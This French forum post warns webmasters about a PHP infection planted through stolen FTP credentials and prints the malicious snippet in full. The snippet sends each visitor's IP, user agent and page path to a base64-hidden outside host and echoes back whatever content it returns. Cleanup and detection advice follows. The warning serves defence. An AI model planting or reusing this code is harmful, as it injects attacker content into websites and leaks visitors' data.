virus php, monitoring bad ip : 31.184.192.197 <== dangerous !!!
Pièces détachées Forum Contact

virus php, monitoring bad ip : 31.184.192.197 <== dangerous !!!

Nous rachetons vos PC portables (et MAC) HS
Administrateur

virus php, monitoring bad ip : 31.184.192.197 <== dangerous !!!

Code:

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdEIvc3RhdC5waHA=').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>

si vous avez ceci dans votre code virez le, votre vos login FTP ont été volés.

c'est un robot qui infecte les index.php footer.php et main.php

changez vos login FTP, votre filezilla client est victime d'une faille, mettez le à jour et changes vos mots de passe ftp en urgence.

il fait semblant d’être un robot de statistique mais en fait il infecte les pc des gens naviguant sur votre site

faite une recherche de masse dans votre dossier www avec dreamweaver en recherchant dans tous vos fichiers php l'expression : "$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);"

si vous voyez sur vos monitoring server des connexions vers  31.184.192.197:80 , une de vos pages php est encore infectée ( mais pour ca faut gerer vos propres serveurs car ce n'est pas détectable dans les logs apache. uniquement sur monitoring des connexions TCP IP sur le process httpd



  



Réponse rapide

forum Répondez et participez librement forum
Services informatiques Merci d'écrire un message de plus de 10 mots en français correct. (Tout message mal rédigé sera effacé.)

Pied de page des forums

Forum : Réseau - Sécurité - Materiel
Php - Référencement - Serveurs - Divers
Windows - Internet - Logiciels - Communication
SARL Brakstar / 485 013 809 R.C.S. BOURGES
2 rue de coulon. 18310 Graçay
Mail : societe@brakstar.com
USA EN ES BR PO DE NL IT SU DN HU JP TE RU PL FI NO GR SE SL ET TH UK SL IN LH RO LE HE BG CZ MS CAT IR CR